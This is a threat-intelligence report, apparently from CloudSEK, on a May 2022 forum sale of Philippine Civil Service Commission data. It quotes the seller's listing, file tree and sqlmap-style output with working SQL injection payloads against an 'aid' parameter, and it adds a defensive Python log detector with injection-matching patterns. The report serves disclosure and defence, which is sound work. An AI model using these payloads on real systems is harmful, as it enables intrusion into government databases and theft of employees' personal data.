Philippines Government and Civil Service Commission Data Exposed in May 2022
In May 2022, threat actors targeted the Philippines Government in cyberattacks that exposed sensitive government data. CloudSEK’s contextual AI digital risk platform XVigil discovered a post on a cybercrime forum advertising compromised data containing sensitive information from the following databases:
Details Shared | |
---|---|
Email:Password Combinations | Employees |
Managers | Job Titles |
Employee IDs | Comments |
Department Data | Locations |
DOB/Termination Dates | Pay Rates/Types |

Details Shared | | |
---|---|---|
Employer ID | City ID | Department ID |
Region ID | Agency ID | Type |
Token | Status | Admin |
Password | Username | Created Date and many more fields |
System Information:
Quote:
- Backend System: Windows 10
- DBMS: MySQL 5.5
- Hostname: WIN-NEJB836KBNF
- DBMS User: 'jmonses@localhost'

Info Provided:
Quote:
- Inventory Logs
- User Logs
- User Database
- Agency Accounts
- MySQL Logins
- PhpMyAdmin Dump
- XAMPP Logins
- FreiChat Chat Logs
- Employee Dump (includes full name, addresses, usernames, personal emails, agency and government employed emails)
- And More
File Structure:
Quote:
```
.
|-- cdcol
|   `-- cds.csv
|-- csc_cdris
|   |-- tblref_subcat.csv
|   |-- tblref_subcat_topic.csv
|   |-- tblref_topic.csv
|   |-- tblresource_master.csv
|   |-- tblusers.csv
|   |-- vw_resource_master.csv
|   |-- vw_subcat_category.csv
|   `-- vw_subcat_topics.csv
|-- csc_guestchat
|   |-- frei_banned_users.csv
|   |-- frei_chat.csv
|   |-- frei_config.csv
|   |-- frei_groupchat.csv
|   |-- frei_rooms.csv
|   |-- frei_session.csv
|   |-- frei_smileys.csv
|   |-- frei_video_session.csv
|   |-- frei_video_session.csv.1
|   |-- frei_webrtc.csv
|   `-- frei_webrtc.csv.1
|-- csc_ighrsdb
|   |-- ref_2020inventorysummary.csv
|   |-- ref_2021inventorysummary_asof_aug16.csv
|   |-- tbl_agencyaccounts.csv
|   |-- tbl_agencyinventory_logs.csv
|   |-- tbl_personnel2.csv
|   |-- tbl_plantilla_jocos.csv
|   |-- tbl_userlogs.csv
|   |-- vw_agencyinventory_logs.csv
|   |-- vw_cscfoaccounts.csv
|   `-- vw_plantilla_sec_uploading_count.csv
|-- csc_ighrsdb_aug312020
|-- mysql
|   `-- user.csv
|-- performance_schema
|   `-- accounts.csv
|-- phpmyadmin
|   |-- pma_bookmark.csv
|   |-- pma_column_info.csv
|   |-- pma_designer_coords.csv
|   |-- pma_history.csv
|   |-- pma_pdf_pages.csv
|   |-- pma_recent.csv
|   |-- pma_relation.csv
|   |-- pma_table_coords.csv
|   |-- pma_table_info.csv
|   |-- pma_table_uiprefs.csv
|   |-- pma_tracking.csv
|   |-- pma_userconfig.csv
|   `-- pma_userconfig.csv.1
`-- webauth
    `-- user_pwd.csv

9 directories, 46 files
```
Data Sample by SQL Injection
DBs Contain
- info of every PH government employee (tbl_personnel, tbl_personnel2) (firstname, lastname, gender, TIN, SSS, agency, citizenship, salary, phone#, email, v3accesskey, etc.)
- agency account logins for IGHRS panel, can manage all data from that agency
- employee chat logs

bunch more you can see below
```
web server operating system: Windows
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.5
---
Parameter: aid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: aid=3094 AND 4076=4076

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: aid=3094 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71786a7871,(SELECT (ELT(5016=5016,1))),0x7162627671,0x78))s), 8446744073709551610, 8446744073709551610)))

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: aid=3094;SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: aid=3094 AND (SELECT 1742 FROM (SELECT(SLEEP(5)))SnYj)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: aid=-3023 UNION ALL SELECT CONCAT(0x71786a7871,0x5558597156435a75594377414f4c7151614d4655626d675a7a4d6f766f6466414364415972426757,0x7162627671)-- -
---
```
Database: information_schema
Database: cdcol
Database: csc_cdris
Database: csc_guestchat
Database: performance_schema
Database: phpmyadmin
Database: webauth
Database: csc_ighrsdb
Database: mysql
Database: csc_ighrsdb_aug312020
Database: csc_lookupdb
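The scanner output quoted above shows every injection technique arriving through the numeric GET parameter `aid`, so a defender can hunt for this activity by flagging any request whose `aid` is not a plain integer. The following is an added example, not part of the CloudSEK report or the forum post; the log lines, the `/app/page.php` path and the addresses are constructed, since the page does not give the real URL.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines in Apache "combined" format (not real traffic).
# /app/page.php is a hypothetical path; the IPs are documentation ranges.
SAMPLE_LOG = """\
198.51.100.5 - - [12/May/2022:10:00:01 +0800] "GET /app/page.php?aid=3094 HTTP/1.1" 200 5120 "-" "-"
203.0.113.77 - - [12/May/2022:10:03:11 +0800] "GET /app/page.php?aid=3094%20AND%204076%3D4076 HTTP/1.1" 200 5120 "-" "-"
203.0.113.77 - - [12/May/2022:10:03:12 +0800] "GET /app/page.php?aid=3094%3BSELECT%20SLEEP(5)%23 HTTP/1.1" 200 5120 "-" "-"
203.0.113.77 - - [12/May/2022:10:03:19 +0800] "GET /app/page.php?aid=3094%20AND%20(SELECT%201742%20FROM%20(SELECT(SLEEP(5)))SnYj) HTTP/1.1" 200 5120 "-" "-"
203.0.113.77 - - [12/May/2022:10:03:25 +0800] "GET /app/page.php?aid=-3023%20UNION%20ALL%20SELECT%20NULL--%20- HTTP/1.1" 200 312 "-" "-"
198.51.100.5 - - [12/May/2022:10:04:40 +0800] "GET /app/page.php?aid=17&tab=2 HTTP/1.1" 200 4987 "-" "-"
"""

# Client IP, timestamp and request target from a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)

# Allowlist: an agency id is expected to be a short run of digits and nothing else.
VALID_ID = re.compile(r"\d{1,10}")

# Coarse labels for triage, named after the technique classes in the quoted output.
FAMILIES = [
    ("stacked queries", re.compile(r";")),
    ("time-based blind", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("UNION query", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("boolean-based blind", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
]


def find_aid_anomalies(log_text, param="aid"):
    """Return one finding per request whose `param` value is not a plain integer."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line in the expected format
        query = urlsplit(match.group("target")).query
        # parse_qs percent-decodes values, so encoded payloads are compared in clear.
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            if VALID_ID.fullmatch(value):
                continue
            labels = [name for name, rx in FAMILIES if rx.search(value)]
            findings.append({
                "ip": match.group("ip"),
                "time": match.group("ts"),
                "value": value,
                "families": labels or ["non-integer value"],
            })
    return findings


if __name__ == "__main__":
    for hit in find_aid_anomalies(SAMPLE_LOG):
        print(hit["time"], hit["ip"], ", ".join(hit["families"]), repr(hit["value"]))
```

The same allowlist belongs in the application itself: a value that fails the integer check should be rejected before it reaches the query, and the query should bind it as a parameter rather than concatenate it.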